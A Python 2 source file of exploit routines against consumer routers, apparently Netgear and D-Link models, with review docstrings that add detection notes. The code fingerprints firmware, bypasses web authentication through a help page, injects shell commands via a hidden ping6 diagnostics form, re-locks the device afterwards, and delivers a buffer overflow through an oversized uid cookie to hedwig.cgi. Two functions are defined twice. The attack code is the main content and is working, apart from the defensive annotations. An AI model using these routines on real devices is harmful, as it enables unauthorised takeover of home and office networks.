def WNDR3700_version_detect(host,logger=None):
    """Guess the firmware build of a WNDR3700v3 from two unauthenticated probes.

    Requests made to *host* (plain http, default port):
      1. GET "/"  -- expected to fail with an HTTP auth challenge whose
         WWW-Authenticate realm contains "WNDR3700v3".
      2. GET "/genie_apply.htm" -- a 401 here selects
         WNDR3700_VERSIONS["1.0.0.18"]; a successful body selects
         WNDR3700_VERSIONS["1.0.0.22"].
    No other outcome is recognised.  Detection note for defenders: that
    exact request pair, with no credentials, is the footprint of this probe.

    Args:
        host: hostname or IP, substituted verbatim into the URL.
        logger: optional object exposing LOG_INFO; when None only the
            Python 2 ``print`` below writes to the console.

    Returns:
        The WNDR3700_VERSIONS entry chosen above (its type is not visible
        in this file).

    Raises:
        Exception: no version identified.  This includes the case where the
            first GET succeeds, because all detection logic lives inside the
            HTTPError handler.
        KeyError: the challenge carries no WWW-Authenticate header
            (``headers['www-authenticate']`` is indexed, not ``.get()``).

    NOTE(review): this file contains a second, identical definition of
    WNDR3700_version_detect; if both are in the same module the later one
    replaces this one at import time.  Indentation below is reconstructed
    from a collapsed listing.
    """
    client=HttpClient()
    version=None
    url="http://%s" % host
    print "trying %s" %url  # Python 2 print statement; this module is Python 2 only
    try:
        client.send(url)
    except HTTPError as httpe:
        basic_realm=httpe.headers['www-authenticate']
        #all known v3 firmwares put WNDR3700v3 in basic realm header
        if basic_realm and "WNDR3700v3" in basic_realm:
            document=None
            try:
                document=client.send("http://%s/genie_apply.htm" % host)
            # Rebinds the outer ``httpe``; harmless, the outer value is not used again.
            except HTTPError as httpe:
                #1.0.0.18 does not have genie and instead returns 401
                if httpe.code==401:
                    if logger:
                        logger.LOG_INFO("Got version 1.0.0.18")
                    version=WNDR3700_VERSIONS["1.0.0.18"]
            if document:
                #1.0.0.22 does have genie and genie_apply.htm does not require auth
                if logger:
                    logger.LOG_INFO("Got version 1.0.0.22")
                version = WNDR3700_VERSIONS["1.0.0.22"]
    if not version:
        raise Exception("WNDR3700 version not detected.")
    return version
def inject_command(command,target,port=80,logger=None,https=False):
    """Submit *command* as the ping6 target of the router's hidden diagnostics form.

    Flow: GET ping6_traceroute6_hidden_info.htm, extract a timestamp from the
    response with extract_timestamp(), then POST to
    ``apply.cgi?/ping6_traceroute6_hidden_info.htm%20timestamp=<ts>`` with
    ``submit_flag=ping6`` and *command* placed verbatim in ``ping6_text``.
    Detection note for defenders: that GET/POST pair, with the form
    submitted outside the normal UI, is the on-the-wire footprint; the
    ping6_text value is whatever the caller supplied, unfiltered.

    Args:
        command: string sent unchanged as the ``ping6_text`` form field.
        target: host or IP substituted into the URL.
        port: TCP port substituted into the URL (default 80).
        logger: object with LOG_INFO/LOG_DEBUG/LOG_WARN; a Logging()
            instance is created when None.
        https: selects the "https" scheme; no certificate handling is
            visible here (that is HttpClient's concern).

    Returns:
        None.  The response to the POST is discarded.

    Raises:
        Exception: (no message) when extract_timestamp() returns a falsy
            value.  Errors from client.send() are not caught and propagate.

    NOTE(review): the timestamp is appended to the URL by plain string
    concatenation, so extract_timestamp() is assumed to return a str -- its
    definition is not in this file; confirm.  Indentation is reconstructed
    from a collapsed listing.
    """
    if not logger:
        logger=Logging()
    client=HttpClient()
    protocol="http"
    if https:
        protocol="https"
    url="%s://%s:%d/ping6_traceroute6_hidden_info.htm" % (protocol,target,port)
    logger.LOG_INFO("Requesting ping6_traceroute6_hidden_info.htm in order to obtain timestamp.")
    resp=client.send(url)
    timestamp=extract_timestamp(resp)
    if timestamp:
        logger.LOG_DEBUG("Got timestamp: %s" % timestamp)
    else:
        logger.LOG_WARN("Couldn't extract timestamp from response.")
        raise Exception()  # no message; callers see a bare Exception
    url="%s://%s:%d/apply.cgi?/ping6_traceroute6_hidden_info.htm" % (protocol,target,port)
    url+="%20timestamp="+timestamp  # raw concatenation, not URL-encoded
    logger.LOG_DEBUG("URL: %s" % url)
    post_data={}
    post_data["submit_flag"]="ping6"
    post_data["ping6_text"]=command
    post_data["traceroute6_text"]=""
    client.send(url,post_data=post_data,urlencode=True)
def relock_target(target,port=80,logger=None,https=False):
    """Re-enable the target's web authentication after unlock_target().

    Returns immediately when is_unlocked() reports the target already
    requires auth.  Otherwise: GET BRS_success.html, extract a timestamp from
    it, and POST ``submit_flag=hijack_success, click_flag=0`` to
    ``apply.cgi?/BRS_netgear_success.html%20timestamp=<ts>``.  Detection note
    for defenders: BRS_success.html followed by that apply.cgi POST is the
    observable sequence.

    Args:
        target: host or IP substituted into the URL.
        port: TCP port substituted into the URL (default 80).
        logger: object with LOG_INFO/LOG_DEBUG/LOG_WARN; Logging() when None.
        https: selects the "https" scheme.

    Returns:
        None in every path; the final response is stored in ``resp`` but
        never used.

    Raises:
        Whatever is_unlocked() or client.send() raise; nothing is caught here.

    NOTE(review): the listing was collapsed onto one line, so the nesting of
    the block after ``else:`` is reconstructed.  As written below, a missing
    timestamp only logs a warning and returns.  If the url/POST lines are
    really at function level, that path instead fails with TypeError on
    ``+ timestamp`` (str + None) -- confirm against the original file.
    """
    if not logger:
        logger=Logging()
    protocol="http"
    if https:
        protocol="https"
    if not is_unlocked(target,port=port,https=https):
        logger.LOG_INFO("Target is already locked!")
        return
    client=HttpClient()
    url="%s://%s:%d/BRS_success.html" %(protocol,target,port)
    logger.LOG_INFO("Requesting BRS_success.html in order to obtain timestamp.")
    resp=client.send(url)
    timestamp=extract_timestamp(resp)
    if not timestamp:
        logger.LOG_WARN("Couldn't extract timestamp from response.")
    else:
        logger.LOG_DEBUG("Timestamp: %s" % timestamp)
        # timestamp is concatenated raw; assumed to be a str (see docstring).
        url=("%s://%s:%d/apply.cgi?/" % (protocol,target,port)+ "BRS_netgear_success.html%20timestamp=" + timestamp)
        post_data={"submit_flag":"hijack_success", "click_flag":"0"}
        resp=client.send(url,post_data=post_data,urlencode=True)  # response unused
def WNDR3700_version_detect(host, logger=None):
    """Guess the firmware build of a WNDR3700v3 from two unauthenticated probes.

    Requests made to *host* (plain http, default port):
      1. GET "/"  -- expected to fail with an HTTP auth challenge whose
         WWW-Authenticate realm contains "WNDR3700v3".
      2. GET "/genie_apply.htm" -- a 401 here selects
         WNDR3700_VERSIONS["1.0.0.18"]; a successful body selects
         WNDR3700_VERSIONS["1.0.0.22"].
    No other outcome is recognised.  Detection note for defenders: that
    exact request pair, with no credentials, is the footprint of this probe.

    Args:
        host: hostname or IP, substituted verbatim into the URL.
        logger: optional object exposing LOG_INFO; when None only the
            Python 2 ``print`` below writes to the console.

    Returns:
        The WNDR3700_VERSIONS entry chosen above (its type is not visible
        in this file).

    Raises:
        Exception: no version identified.  This includes the case where the
            first GET succeeds, because all detection logic lives inside the
            HTTPError handler.
        KeyError: the challenge carries no WWW-Authenticate header
            (``headers['www-authenticate']`` is indexed, not ``.get()``).

    NOTE(review): this is a byte-for-byte logical duplicate (whitespace
    aside) of an earlier WNDR3700_version_detect in this file; in the same
    module the later definition is the one that survives import.
    Indentation below is reconstructed from a collapsed listing.
    """
    client = HttpClient()
    version = None
    url = "http://%s" % host
    print "trying %s" % url  # Python 2 print statement; this module is Python 2 only
    try:
        client.send(url)
    except HTTPError as httpe:
        basic_realm = httpe.headers['www-authenticate']
        #all known v3 firmwares put WNDR3700v3 in basic realm header
        if basic_realm and "WNDR3700v3" in basic_realm:
            document = None
            try:
                document = client.send("http://%s/genie_apply.htm" % host)
            # Rebinds the outer ``httpe``; harmless, the outer value is not used again.
            except HTTPError as httpe:
                #1.0.0.18 does not have genie and instead returns 401
                if httpe.code == 401:
                    if logger:
                        logger.LOG_INFO("Got version 1.0.0.18")
                    version = WNDR3700_VERSIONS["1.0.0.18"]
            if document:
                #1.0.0.22 does have genie and genie_apply.htm does not require auth
                if logger:
                    logger.LOG_INFO("Got version 1.0.0.22")
                version = WNDR3700_VERSIONS["1.0.0.22"]
    if not version:
        raise Exception("WNDR3700 version not detected.")
    return version
def send_overflow(buf,target_ip,logger):
    """POST to /hedwig.cgi on *target_ip* with *buf* carried in the ``uid`` cookie.

    The request is a fixed form body
    ``SERVICES=WIFI.PHYINF,RUNTIME.PHYINF,RUNTIME.DFS`` with a hard-coded
    Referer of ``http://192.168.0.1/bsc_wlan.php`` (note: not derived from
    *target_ip*).  Detection note for defenders: a request for hedwig.cgi
    whose ``uid`` cookie is unusually long or non-alphanumeric is the
    observable anomaly.

    Args:
        buf: any object; ``str(buf)`` becomes the cookie value.
        target_ip: host or IP substituted into the URL (http, default port).
        logger: object with LOG_INFO; required, no default.

    Returns:
        None on both the success and the error path.

    Raises:
        Nothing from the send: every Exception is caught, printed with the
        Python 2 ``print`` statement and swallowed, so the caller cannot
        tell a refused connection from a delivered request.
    """
    client=HttpClient()
    headers={}
    headers["Referer"]="http://192.168.0.1/bsc_wlan.php"  # fixed value, independent of target_ip
    headers["Content-Type"]="application/x-www-form-urlencoded; charset=UTF-8"
    headers["Connection"]="keep-alive"
    headers["Cookie"]="uid=%s" % str(buf)
    url="http://%s/hedwig.cgi" % target_ip
    post_data='SERVICES=WIFI.PHYINF,RUNTIME.PHYINF,RUNTIME.DFS'
    logger.LOG_INFO("Sending post request.")
    try:
        client.send(url,headers=headers,post_data=post_data,urlencode=True)
    except Exception as e:
        # Broad catch: any failure (network, HTTP, programming error) is only printed.
        print e
        return
def unlock_target(target,port=80,logger=None,https=False):
    """Request BRS_02_genieHelp.html and verify that index.htm then loads without auth.

    Skips the request when is_unlocked() is already true.  Otherwise one
    GET of ``BRS_02_genieHelp.html`` is sent and is_unlocked() is re-run to
    confirm the effect.  Detection note for defenders: an unauthenticated GET
    of BRS_02_genieHelp.html immediately preceded and followed by GETs of
    index.htm is the sequence this routine produces.

    Args:
        target: host or IP substituted into the URL.
        port: TCP port substituted into the URL (default 80).
        logger: object with LOG_INFO/LOG_WARN; Logging() when None.
        https: selects the "https" scheme.

    Returns:
        None.

    Raises:
        Exception("Unlock failed."): index.htm still requires auth after the
            request.  Errors from is_unlocked()/client.send() propagate.

    NOTE(review): indentation reconstructed from a collapsed listing; since
    the ``if`` branch returns, nesting the remainder under ``else`` or at
    function level is behaviourally the same.
    """
    if not logger:
        logger=Logging()
    protocol="http"
    if https:
        protocol="https"
    if is_unlocked(target,port=port,https=https):
        logger.LOG_INFO("Target is already unlocked.")
        return
    else:
        logger.LOG_INFO("Unlocking target.")
        client=HttpClient()
        url="%s://%s:%d/BRS_02_genieHelp.html" % (protocol,target,port)
        client.send(url)  # response body is not inspected
        if is_unlocked(target,port=port,https=https):
            logger.LOG_INFO("Target unlocked!")
        else:
            logger.LOG_WARN("Target unlock failed!")
            raise Exception("Unlock failed.")
def is_unlocked(target,port=80,https=False):
    """Return True if index.htm on *target* can be fetched without credentials.

    A successful client.send() means unlocked; an HTTPError with code 401
    means locked.  Any other HTTPError code is re-raised, so a 404 or 5xx
    is an error, not a "locked" verdict.  A fresh Logging() is created on
    every call (no logger parameter, unlike the sibling functions).

    Args:
        target: host or IP substituted into the URL.
        port: TCP port substituted into the URL (default 80).
        https: selects the "https" scheme.

    Returns:
        bool.

    Raises:
        HTTPError: any status other than 401 that HttpClient reports as an
            error; non-HTTP failures from client.send() also propagate.
    """
    logger=Logging()
    protocol="http"
    if https:
        protocol="https"
    client=HttpClient()
    url="%s://%s:%d/index.htm" % (protocol,target,port)
    unlocked = False
    try:
        client.send(url)
        unlocked=True
    except HTTPError as e:
        logger.LOG_DEBUG("Got code: %s" % e.code)
        if e.code == 401:
            unlocked=False
        else:
            raise  # only 401 is interpreted; everything else is an error
    return unlocked
def fingerprint_netgear_version(target, port=80, https=False):
    """Fetch currentsetting.htm and parse its ``key=value`` lines into a dict.

    Args:
        target: host or IP substituted into the URL.
        port: TCP port substituted into the URL (default 80).
        https: selects the "https" scheme.

    Returns:
        dict mapping each line's left side to its right side, or {} when the
        page answers 401 or 404.  Later duplicate keys overwrite earlier ones.

    Raises:
        HTTPError: any error status other than 401/404.
        ValueError: a line that does not contain exactly one "=" -- a blank
            line or a value containing "=" -- because the two-name unpack of
            ``split("=")`` then fails.  The whole call fails, not just that line.

    NOTE(review): this file holds a second definition of
    fingerprint_netgear_version with identical logic; in the same module the
    later one replaces this one at import time.  Indentation reconstructed
    from a collapsed listing.
    """
    client = HttpClient()
    protocol = "http"
    if https:
        protocol = "https"
    url = "%s://%s:%d/currentsetting.htm" % (protocol, target, port)
    try:
        resp = client.send(url)
    except HTTPError as e:
        if e.code == 401 or e.code == 404:
            return {}
        else:
            raise
    # resp is used as text here (splitlines); its exact type comes from HttpClient.
    lines = resp.splitlines()
    fingerprint = {}
    for line in lines:
        (k, v) = line.strip().split("=")  # ValueError unless exactly one "="
        fingerprint[k] = v
    return fingerprint
def fingerprint_netgear_version(target,port=80,https=False):
    """Fetch currentsetting.htm and parse its ``key=value`` lines into a dict.

    Args:
        target: host or IP substituted into the URL.
        port: TCP port substituted into the URL (default 80).
        https: selects the "https" scheme.

    Returns:
        dict mapping each line's left side to its right side, or {} when the
        page answers 401 or 404.  Later duplicate keys overwrite earlier ones.

    Raises:
        HTTPError: any error status other than 401/404.
        ValueError: a line that does not contain exactly one "=" -- a blank
            line or a value containing "=" -- because the two-name unpack of
            ``split("=")`` then fails.  The whole call fails, not just that line.

    NOTE(review): duplicate (whitespace aside) of an earlier
    fingerprint_netgear_version in this file; in the same module this later
    definition is the one that survives import.  Indentation reconstructed
    from a collapsed listing.
    """
    client=HttpClient()
    protocol="http"
    if https:
        protocol="https"
    url="%s://%s:%d/currentsetting.htm" % (protocol,target,port)
    try:
        resp=client.send(url)
    except HTTPError as e:
        if e.code==401 or e.code == 404:
            return {}
        else:
            raise
    # resp is used as text here (splitlines); its exact type comes from HttpClient.
    lines=resp.splitlines()
    fingerprint={}
    for line in lines:
        (k,v)=line.strip().split("=")  # ValueError unless exactly one "="
        fingerprint[k]=v
    return fingerprint